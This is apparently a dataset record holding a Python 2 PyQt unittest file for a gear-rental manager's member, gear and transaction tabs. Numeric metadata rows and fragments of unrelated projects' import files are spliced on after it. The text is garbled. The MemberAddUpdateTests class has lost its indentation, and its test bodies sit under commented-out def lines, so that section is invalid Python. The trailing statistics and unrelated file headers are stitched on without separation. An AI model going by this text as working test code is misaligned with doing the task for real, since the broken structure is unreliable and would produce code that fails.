        self.membA1['Phone'] = '11111A1111'
        tests.enterMemberInfo(self, self.membA1)
        self.assertFalse(self.tMemb.Button_addUpdButClick())

    def test_AddUpdMember_quotesInName1(self):
        """A single quote inside a first name is accepted."""
        self.membA1['FirstName'] = "AA'A"
        tests.enterMemberInfo(self, self.membA1)
        self.assertTrue(self.tMemb.Button_addUpdButClick())

    def test_AddUpdMember_quotesInName2(self):
        """A double quote inside a first name is accepted."""
        self.membA1['FirstName'] = 'AA"A'
        tests.enterMemberInfo(self, self.membA1)
        self.assertTrue(self.tMemb.Button_addUpdButClick())

    def tearDown(self):
        """Clear UI state, drop all tables, and shut the application down."""
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        self.tMemb.clear_fields()
        # Drop every table so the next test starts from a clean schema.
        for table in self.ui.db.tableDefs.keys():
            self.ui.db.execQuery('DROP TABLE ' + table, 'tests_trans -> tearDown')
        self.ui.db.close()
        self.app.quit()
        del self.app
class MemberAddUpdateTests(unittest.TestCase):
def setUp(self):
    """Create a fresh app/UI/database and two member fixtures before each test."""
    # Reuse the process-wide QApplication if one exists; Qt allows only
    # one instance per process.
    self.app = QtGui.QApplication.instance()
    if self.app is None:
        self.app = QtGui.QApplication(sys.argv)
    self.app.setQuitOnLastWindowClosed(True)
    # Start every test from an empty database file.
    if os.path.isfile(tests.dBName):
        os.remove(tests.dBName)
    self.ui = GearManager.MainUI(tests.dBName)
    # Dismiss the default-due-date dialog shown at startup.
    self.ui.defDueDateWin.okBut.click()
    # Tab index 1 is the Member tab -- TODO confirm against MainUI tab order.
    self.ui.tabWid.setCurrentIndex(1)
    self.tMemb = self.ui.tabWid.widget(1)
    self.membA1 = tests.mkMember('A', 1)
    self.membB2 = tests.mkMember('B', 2)
# Check that the database is open
def test_databaseConnection(self):
self.assertTrue(self.ui.db.SQLDB.isOpen(), 'Database is not open')
# Add a member, should work
# def test_AddMember_addNewMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.areMemberFieldsValid())
self.assertTrue(self.tMemb.Button_addUpdButClick())
# Add the same member, should fail
# def test_AddMember_addIdenticalMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.areMemberFieldsValid())
self.assertFalse(self.tMemb.Button_addUpdButClick())
# Update existing member, but no valid member in the search field, should fail
# def test_AddMember_updateMember_noCurrentMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.areMemberFieldsValid())
self.assertFalse(self.tMemb.Button_addUpdButClick())
# Update existing member, should work
# def test_AddMember_updateMember_currentMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
self.assertTrue(self.tMemb.Button_addUpdButClick())
# Add non-existing member, should work
# def test_AddMember_addNonMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membB2)
self.assertTrue(self.tMemb.areMemberFieldsValid())
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the same member, should work
# def test_AddMember_updateMember(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
# AddUpd the same member but with a new first name, should work
# def test_AddMember_newFName(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.membA1['FirstName'] = 'AAAA'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the same member but with a new last name, should work
# def test_AddMember_newLName(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.membA1['LastName'] = 'AAAA'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the same member but with a new birthday, should work
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.membA1['Birthday'] = '1800-01-01'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday, should work
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.membA1['Birthday'] = '1800-01-02'
tests.enterMemberInfo(self, self.membA1)
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday
# Two members with the same name, but different birthdays now exist,
# should fail without selecting the correct birthday
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday
# Two members with the same name, but different birthdays now exist,
# should work if selecting the first birthday
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
self.tMemb.bDayBox.setCurrentIndex(self.tMemb.bDayBox.findText(Util.convert_date('DB2Disp', '1800-01-01')))
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday
# Two members with the same name, but different birthdays now exist,
# should work if selecting the second birthday
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
self.tMemb.bDayBox.setCurrentIndex(self.tMemb.bDayBox.findText(Util.convert_date('DB2Disp', '1800-01-02')))
self.assertTrue(self.tMemb.Button_addUpdButClick())
# AddUpd the current member with a new birthday that matches an existing members name/birthday, should not work
# def test_AddMember_newBDay(self):
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
self.tMemb.nameSearch.setText('{} {}'.format(self.membA1['FirstName'], self.membA1['LastName']))
self.tMemb.bDayBox.setCurrentIndex(self.tMemb.bDayBox.findText(Util.convert_date('DB2Disp', '1900-01-01')))
self.membA1['Birthday'] = '1800-01-02'
tests.enterMemberInfo(self, self.membA1)
self.assertFalse(self.tMemb.Button_addUpdButClick())
def tearDown(self):
self.ui.tabWid.setCurrentIndex(1)
self.tMemb.nameSearch.clear()
self.tMemb.clear_fields()
for table in self.ui.db.tableDefs.keys():
self.ui.db.execQuery('DROP TABLE ' + table, 'tests_memb -> tearDown')
self.ui.db.close()
self.app.quit()
del self.app
#
# --- Gear Tab tests ---------------------------------------------------------------------------------------------------
#
class GearValueTests(unittest.TestCase):
    """Field-validation tests for the Gear tab (ID, quantity, weight, price).

    NOTE(review): uses ``xrange``, so this file targets Python 2.
    """
    def setUp(self):
        """Create a fresh database/UI, select the Gear tab, build one gear fixture."""
        self.app = QtGui.QApplication.instance()
        if self.app is None:
            self.app = QtGui.QApplication(sys.argv)
        self.app.setQuitOnLastWindowClosed(True)
        # Start from an empty database file.
        if os.path.isfile(tests.dBName):
            os.remove(tests.dBName)
        self.ui = GearManager.MainUI(tests.dBName)
        self.ui.defDueDateWin.okBut.click()
        self.ui.tabWid.setCurrentIndex(2)
        self.tGear = self.ui.tabWid.widget(2)
        self.gearA1 = tests.mkGear('A', 1)
        # Clear the current gear selection and gear fields
        self.tGear.gNameIDSearch.clear()
        self.tGear.clear_fields()
    def test_addGear(self):
        # A fully valid gear item should save successfully.
        tests.enterGearInfo(self, self.gearA1)
        self.assertTrue(self.tGear.button_save_gear())
    # The quantity window has limits on the inputs that cover this case
    def test_negativeQuant(self):
        # Negated quantity still saves: the quantity widget clamps input.
        self.gearA1['Quantity'] = -self.gearA1['Quantity']
        tests.enterGearInfo(self, self.gearA1)
        self.assertTrue(self.tGear.button_save_gear())
    def test_iD(self):
        # A plain alphanumeric ID is accepted.
        self.gearA1['ID'] = 'ID1'
        tests.enterGearInfo(self, self.gearA1)
        self.assertTrue(self.tGear.button_save_gear())
    def test_iDWithStar1(self):
        # Fill IDs 01,02,03,05,10,22,42; 'ID*' should auto-assign the lowest
        # free two-digit suffix, which is 04.
        for n in [1, 2, 5, 22, 10, 3, 42]:
            self.gearA1['ID'] = 'ID{:02}'.format(n)
            tests.enterGearInfo(self, self.gearA1)
            self.assertTrue(self.tGear.button_save_gear())
        self.gearA1['ID'] = 'ID*'
        tests.enterGearInfo(self, self.gearA1)
        self.assertTrue(self.tGear.button_save_gear())
        self.assertEqual(self.tGear.GIDEdit.text(), 'ID04')
    def test_iDWithStar2(self):
        # Fill IDs 01..22 and 24; the first gap is 23, so 'ID*' should land there.
        end = 23
        for n in xrange(1, end):
            self.gearA1['ID'] = 'ID{:02}'.format(n)
            tests.enterGearInfo(self, self.gearA1)
            self.assertTrue(self.tGear.button_save_gear())
        self.gearA1['ID'] = 'ID{:02}'.format(end + 1)
        tests.enterGearInfo(self, self.gearA1)
        self.assertTrue(self.tGear.button_save_gear())
        self.gearA1['ID'] = 'ID*'
        tests.enterGearInfo(self, self.gearA1)
        self.assertTrue(self.tGear.button_save_gear())
        self.assertEqual(self.tGear.GIDEdit.text(), 'ID{}'.format(end))
    def test_iDWithStarX2(self):
        # Only a single '*' wildcard is allowed in an ID.
        self.gearA1['ID'] = 'ID**'
        tests.enterGearInfo(self, self.gearA1)
        self.assertFalse(self.tGear.button_save_gear())
    def test_negativeWeight(self):
        # A negative weight is invalid.
        self.gearA1['Weight'] = -self.gearA1['Weight']
        tests.enterGearInfo(self, self.gearA1)
        self.assertFalse(self.tGear.button_save_gear())
    def test_characterInWeight(self):
        # A non-numeric weight is invalid.
        self.gearA1['Weight'] = 'AAA'
        tests.enterGearInfo(self, self.gearA1)
        self.assertFalse(self.tGear.button_save_gear())
    def test_negativePrice(self):
        # A negative price is invalid.
        self.gearA1['Price'] = -self.gearA1['Price']
        tests.enterGearInfo(self, self.gearA1)
        self.assertFalse(self.tGear.button_save_gear())
    def tearDown(self):
        """Clear the Gear tab, drop all tables, and quit the app."""
        self.ui.tabWid.setCurrentIndex(2)
        self.tGear.gNameIDSearch.clear()
        self.tGear.clear_fields()
        # Drop every schema-defined table so the next setUp starts clean.
        for table in self.ui.db.tableDefs.keys():
            self.ui.db.execQuery('DROP TABLE ' + table, 'tests_trans -> tearDown')
        self.ui.db.close()
        self.app.quit()
        del self.app
#
# --- Transaction Tab tests --------------------------------------------------------------------------------------------
#
# Module-level fixtures shared by every TransactionTests case:
# two members and two pieces of gear, registered in TransactionTests.setUp.
membList = [tests.mkMember('A', 1), tests.mkMember('B', 2)]
gearList = [tests.mkGear('A', 1), tests.mkGear('B', 2)]
class TransactionTests(unittest.TestCase):
    """End-to-end check-out/check-in tests for the Transaction tab.

    setUp builds a fresh database, configures semester dates and the fee
    on the Admin tab, registers the shared members/gear, marks both
    members as paid, and pre-selects membList[0] and gearList[0].
    """
    def setUp(self):
        # Reuse a single QApplication; Qt allows only one per process.
        self.app = QtGui.QApplication.instance()
        if self.app is None:
            self.app = QtGui.QApplication(sys.argv)
        self.app.setQuitOnLastWindowClosed(True)
        # Start from an empty database file.
        if os.path.isfile(tests.dBName):
            os.remove(tests.dBName)
        self.ui = GearManager.MainUI(tests.dBName)
        self.ui.defDueDateWin.okBut.click()
        self.tTran = self.ui.tabWid.widget(0)
        self.tMemb = self.ui.tabWid.widget(1)
        self.tGear = self.ui.tabWid.widget(2)
        self.tAdmn = self.ui.tabWid.widget(3)
        # Configure semester dates and the payment amount on the Admin tab.
        # NOTE(review): semFalStr is set twice (future, then past) --
        # presumably to force the dateChanged signal to fire; confirm.
        self.ui.tabWid.setCurrentIndex(3)
        self.tAdmn.semFalStr.setDate(QtCore.QDate.currentDate().addDays(1))
        self.tAdmn.semFalStr.setDate(QtCore.QDate.currentDate().addDays(-1))
        self.tAdmn.semSprStr.setDate(QtCore.QDate.currentDate().addDays(7))
        self.tAdmn.amountBox.setValue(20)
        # Register the shared members.
        self.ui.tabWid.setCurrentIndex(1)
        for memb in membList:
            self.tMemb.nameSearch.clear()
            tests.enterMemberInfo(self, memb)
            self.tMemb.Button_addUpdButClick()
        # Mark each member as paid through the payment window.
        self.ui.tabWid.setCurrentIndex(0)
        for memb in membList:
            setTransMemb(self, memb)
            QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
            QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
            self.tTran.payWind.close()
        # Register the shared gear.
        for gear in gearList:
            self.tGear.gNameIDSearch.clear()
            tests.enterGearInfo(self, gear)
            QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
        # Clear every tab, then pre-select the default member and gear.
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        self.tMemb.clear_fields()
        self.ui.tabWid.setCurrentIndex(2)
        self.tGear.gNameIDSearch.clear()
        self.tGear.clear_fields()
        self.ui.tabWid.setCurrentIndex(0)
        self.tTran.nameSearch.clear()
        self.tTran.gNameIDSearch.clear()
        setTransMemb(self, membList[0])
        setTransGear(self, gearList[0], 'Name')
    def test_trans(self):
        """Check-in before check-out fails; out/in must strictly alternate."""
        self.tTran.radioIn.click()
        self.assertFalse(self.tTran.trans())
        self.tTran.radioOut.click()
        self.assertTrue(self.tTran.trans())
        self.tTran.radioOut.click()
        self.assertFalse(self.tTran.trans())
        self.tTran.radioIn.click()
        self.assertTrue(self.tTran.trans())
    def test_returnForSomeoneElse(self):
        """Member B can return gear that member A checked out."""
        self.assertFalse(self.tTran.nameRetSearch.isEnabled())
        self.tTran.radioOut.click()
        self.assertTrue(self.tTran.trans())
        self.assertFalse(self.tTran.nameRetSearch.isEnabled())
        setTransMemb(self, membList[1])
        self.assertFalse(self.tTran.nameRetSearch.isEnabled())
        self.tTran.radioIn.click()
        self.assertTrue(self.tTran.nameRetSearch.isEnabled())
        # BUG FIX: was assertTrue(count(), 2) -- the 2 was silently used as
        # the failure *message*, so the comparison never happened.
        self.assertEqual(self.tTran.nameRetSearch.count(), 2)
        self.tTran.nameRetSearch.setCurrentIndex(self.tTran.nameRetSearch.findText(
            membList[0]['FirstName'] + ' ' + membList[0]['LastName']))
        self.assertTrue(self.tTran.trans())
    def test_returnForSomeoneElseFields(self):
        """Return-for search re-disables when the borrower is selected again."""
        self.assertFalse(self.tTran.nameRetSearch.isEnabled())
        self.tTran.radioOut.click()
        self.assertTrue(self.tTran.trans())
        self.assertFalse(self.tTran.nameRetSearch.isEnabled())
        setTransMemb(self, membList[1])
        self.assertFalse(self.tTran.nameRetSearch.isEnabled())
        self.tTran.radioIn.click()
        self.assertTrue(self.tTran.nameRetSearch.isEnabled())
        setTransMemb(self, membList[0])
        self.assertFalse(self.tTran.nameRetSearch.isEnabled())
    def test_notPaid(self):
        """A member who never paid cannot check gear out."""
        self.ui.tabWid.setCurrentIndex(2)
        gear = tests.mkGear('E', 5)
        tests.enterGearInfo(self, gear)
        QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        memb = tests.mkMember('V', 6, forms=True, campusLink=True,
                              formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(1)),
                              campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-2)))
        QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
        tests.enterMemberInfo(self, memb)
        self.assertTrue(self.tMemb.Button_addUpdButClick())
        self.ui.tabWid.setCurrentIndex(0)
        setTransGear(self, gear, 'Name')
        setTransMemb(self, memb)
        # No payment is made for this member, so check-out must fail.
        self.tTran.radioOut.click()
        self.assertFalse(self.tTran.trans())
    def test_noForm(self):
        """A paid member without forms on file cannot check gear out."""
        self.ui.tabWid.setCurrentIndex(2)
        gear = tests.mkGear('F', 6)
        tests.enterGearInfo(self, gear)
        QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        memb = tests.mkMember('A', 1, forms=False, campusLink=True,
                              formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate()),
                              campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-2)))
        QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
        tests.enterMemberInfo(self, memb)
        self.assertTrue(self.tMemb.Button_addUpdButClick())
        self.ui.tabWid.setCurrentIndex(0)
        setTransGear(self, gear, 'Name')
        setTransMemb(self, memb)
        QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
        QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
        self.tTran.payWind.close()
        self.tTran.radioOut.click()
        self.assertFalse(self.tTran.trans())
    def test_oldForm(self):
        """A paid member whose forms date is in the past cannot check out."""
        self.ui.tabWid.setCurrentIndex(2)
        gear = tests.mkGear('G', 7)
        tests.enterGearInfo(self, gear)
        QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        memb = tests.mkMember('A', 1, forms=True, campusLink=True,
                              formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-10)),
                              campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(2)))
        QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
        tests.enterMemberInfo(self, memb)
        self.assertTrue(self.tMemb.Button_addUpdButClick())
        self.ui.tabWid.setCurrentIndex(0)
        setTransGear(self, gear, 'Name')
        setTransMemb(self, memb)
        QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
        QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
        self.tTran.payWind.close()
        self.tTran.radioOut.click()
        self.assertFalse(self.tTran.trans())
    def test_paid_currentForm_currentCampus(self):
        """Paid + current forms + current campus link allows check-out."""
        self.ui.tabWid.setCurrentIndex(2)
        gear = tests.mkGear('H', 8)
        tests.enterGearInfo(self, gear)
        QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        memb = tests.mkMember('A', 1, forms=True, campusLink=True,
                              formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(1)),
                              campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-1)))
        QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
        tests.enterMemberInfo(self, memb)
        self.assertTrue(self.tMemb.Button_addUpdButClick())
        self.ui.tabWid.setCurrentIndex(0)
        setTransGear(self, gear, 'Name')
        setTransMemb(self, memb)
        QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
        QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
        self.tTran.payWind.close()
        self.tTran.radioOut.click()
        self.assertTrue(self.tTran.trans())
    def test_noCampusLink(self):
        """A paid member without a campus link cannot check gear out."""
        self.ui.tabWid.setCurrentIndex(2)
        gear = tests.mkGear('I', 9)
        tests.enterGearInfo(self, gear)
        QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        memb = tests.mkMember('A', 1, forms=True, campusLink=False,
                              formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-2)),
                              campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate()))
        QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
        tests.enterMemberInfo(self, memb)
        self.assertTrue(self.tMemb.Button_addUpdButClick())
        self.ui.tabWid.setCurrentIndex(0)
        setTransGear(self, gear, 'Name')
        setTransMemb(self, memb)
        QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
        QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
        self.tTran.payWind.close()
        self.tTran.radioOut.click()
        self.assertFalse(self.tTran.trans())
    def test_campusLinkLastYears(self):
        """An old campus-link date is still acceptable for check-out."""
        self.ui.tabWid.setCurrentIndex(2)
        gear = tests.mkGear('J', 10)
        tests.enterGearInfo(self, gear)
        QTest.mouseClick(self.tGear.updtBut, QtCore.Qt.LeftButton)
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        memb = tests.mkMember('A', 1, forms=True, campusLink=True,
                              formsDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(1)),
                              campusDate=Util.convert_date('Qt2DB', QtCore.QDate.currentDate().addDays(-10)))
        QTest.keyClicks(self.tMemb.nameSearch, memb['FirstName'] + ' ' + memb['LastName'])
        tests.enterMemberInfo(self, memb)
        self.assertTrue(self.tMemb.Button_addUpdButClick())
        self.ui.tabWid.setCurrentIndex(0)
        setTransGear(self, gear, 'Name')
        setTransMemb(self, memb)
        QTest.mouseClick(self.tTran.payBut, QtCore.Qt.LeftButton)
        QTest.mouseClick(self.tTran.payWind.payBut, QtCore.Qt.LeftButton)
        self.tTran.payWind.close()
        self.tTran.radioOut.click()
        self.assertTrue(self.tTran.trans())
    def test_defaultDueDateWhenMemberChanges(self):
        """Selecting a different member resets the due date to the default."""
        nDays = 50
        self.tTran.dueDateCal.setSelectedDate(self.ui.db.getDefaultDueDate())
        self.ui.tabWid.setCurrentIndex(0)
        setTransMemb(self, membList[0])
        self.tTran.dueDateCal.setSelectedDate(QtCore.QDate.currentDate().addDays(nDays))
        # FIX: assertEquals is a deprecated alias of assertEqual.
        self.assertEqual(self.tTran.dueDateCal.selectedDate(), QtCore.QDate.currentDate().addDays(nDays))
        setTransMemb(self, membList[1])
        self.assertEqual(self.tTran.dueDateCal.selectedDate(), self.ui.db.getDefaultDueDate())
    def tearDown(self):
        """Clear every tab, drop all tables, and quit the app."""
        self.ui.tabWid.setCurrentIndex(1)
        self.tMemb.nameSearch.clear()
        self.tMemb.clear_fields()
        self.ui.tabWid.setCurrentIndex(2)
        self.tGear.gNameIDSearch.clear()
        self.tGear.clear_fields()
        self.ui.tabWid.setCurrentIndex(0)
        self.tTran.nameSearch.clear()
        self.tTran.gNameIDSearch.clear()
        # Drop every schema-defined table so the next setUp starts clean.
        for table in self.ui.db.tableDefs.keys():
            self.ui.db.execQuery('DROP TABLE ' + table, 'tests_trans -> tearDown')
        self.ui.db.close()
        self.app.quit()
        del self.app
def setTransMemb(this, membAttr):
    """Type a member's full name into the transaction search box and, when
    several members share that name, pick the entry with the matching
    birthday from the disambiguation combo box."""
    full_name = membAttr['FirstName'] + ' ' + membAttr['LastName']
    this.tTran.nameSearch.clear()
    QTest.keyClicks(this.tTran.nameSearch, full_name)
    if this.tTran.bDayBox.count() > 1:
        bday_index = this.tTran.bDayBox.findText(membAttr['Birthday'])
        this.tTran.bDayBox.setCurrentIndex(bday_index)
def setTransGear(this, gearAttr, nameID):
    """Type a gear item's Name or ID (chosen by ``nameID``) into the gear
    search box; when several items match, disambiguate using the *other*
    field (ID when searching by Name, Name when searching by ID)."""
    other_field = 'ID' if nameID == 'Name' else 'Name'
    this.tTran.gNameIDSearch.clear()
    QTest.keyClicks(this.tTran.gNameIDSearch, gearAttr[nameID])
    if this.tTran.gDissAmbSearch.count() > 1:
        other_index = this.tTran.gDissAmbSearch.findText(gearAttr[other_field])
        this.tTran.gDissAmbSearch.setCurrentIndex(other_index)
def setReturnMemb(this, membAttr):
    """Select, in the return-for widgets, the member the gear is being
    returned on behalf of; each widget is only touched when enabled."""
    ret_name = this.tTran.nameRetSearch
    ret_bday = this.tTran.bDayRetBox
    if ret_name.isEnabled():
        full_name = membAttr['FirstName'] + ' ' + membAttr['LastName']
        ret_name.setCurrentIndex(ret_name.findText(full_name))
    if ret_bday.isEnabled() and ret_bday.count() > 1:
        ret_bday.setCurrentIndex(ret_bday.findText(membAttr['Birthday']))
| 38.613409
| 135
| 0.651914
| 3,049
| 27,068
| 5.726796
| 0.096425
| 0.05309
| 0.043296
| 0.052574
| 0.830021
| 0.80465
| 0.790905
| 0.771376
| 0.753221
| 0.726992
| 0
| 0.013595
| 0.211948
| 27,068
| 700
| 136
| 38.668571
| 0.804979
| 0.084897
| 0
| 0.725806
| 0
| 0
| 0.03661
| 0
| 0
| 0
| 0
| 0
| 0.155242
| 1
| 0.086694
| false
| 0
| 0.018145
| 0
| 0.112903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da3284c6b749a0f044382110d08615aadba15bdf
| 106
|
py
|
Python
|
observing_suite/__init__.py
|
prappleizer/observing-suite
|
b8d342a6515da7357e34c51c7fdef9cff6eee125
|
[
"MIT"
] | 3
|
2022-02-26T20:01:09.000Z
|
2022-03-15T22:34:50.000Z
|
observing_suite/__init__.py
|
prappleizer/observing-suite
|
b8d342a6515da7357e34c51c7fdef9cff6eee125
|
[
"MIT"
] | null | null | null |
observing_suite/__init__.py
|
prappleizer/observing-suite
|
b8d342a6515da7357e34c51c7fdef9cff6eee125
|
[
"MIT"
] | null | null | null |
from .target import *
from .imaging import *
from .observing_plan import *
from .observing_log import *
| 26.5
| 30
| 0.754717
| 14
| 106
| 5.571429
| 0.5
| 0.384615
| 0.487179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169811
| 106
| 4
| 31
| 26.5
| 0.886364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
da5e0d47aee2c534b2ce24dca1534f07435557b7
| 59
|
py
|
Python
|
l10n_br_automated_payment/wizard/__init__.py
|
kaoecoito/odoo-brasil
|
6e019efc4e03b2e7be6ca51d08ace095240e0f07
|
[
"MIT"
] | 181
|
2016-11-11T04:39:43.000Z
|
2022-03-14T21:17:19.000Z
|
l10n_br_automated_payment/wizard/__init__.py
|
kaoecoito/odoo-brasil
|
6e019efc4e03b2e7be6ca51d08ace095240e0f07
|
[
"MIT"
] | 899
|
2016-11-14T02:42:56.000Z
|
2022-03-29T20:47:39.000Z
|
l10n_br_automated_payment/wizard/__init__.py
|
kaoecoito/odoo-brasil
|
6e019efc4e03b2e7be6ca51d08ace095240e0f07
|
[
"MIT"
] | 227
|
2016-11-10T17:16:59.000Z
|
2022-03-26T16:46:38.000Z
|
from . import wizard_iugu
from . import wizard_new_payment
| 19.666667
| 32
| 0.830508
| 9
| 59
| 5.111111
| 0.666667
| 0.434783
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 59
| 3
| 32
| 19.666667
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
da5fa75dbde247a9cd6263b9d50bb2346ec3f2ee
| 183
|
py
|
Python
|
luupsmap/model/__init__.py
|
Team-LANS/luups-map
|
f9d5dddee86d9141dd6e2ae071c8e6fa37f376f2
|
[
"MIT"
] | 1
|
2019-07-30T17:13:41.000Z
|
2019-07-30T17:13:41.000Z
|
luupsmap/model/__init__.py
|
Team-LANS/luups-map
|
f9d5dddee86d9141dd6e2ae071c8e6fa37f376f2
|
[
"MIT"
] | 15
|
2019-02-09T13:27:18.000Z
|
2019-04-01T21:18:52.000Z
|
luupsmap/model/__init__.py
|
Team-LANS/luups-map
|
f9d5dddee86d9141dd6e2ae071c8e6fa37f376f2
|
[
"MIT"
] | null | null | null |
from luupsmap.model.enums import *
from luupsmap.model.location import *
from luupsmap.model.voucher import *
from luupsmap.model.venue import *
from luupsmap.model.interval import *
| 30.5
| 37
| 0.808743
| 25
| 183
| 5.92
| 0.36
| 0.405405
| 0.574324
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10929
| 183
| 5
| 38
| 36.6
| 0.907975
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
da61fe523a2a1e43762399a146481907e7e49e43
| 16,942
|
py
|
Python
|
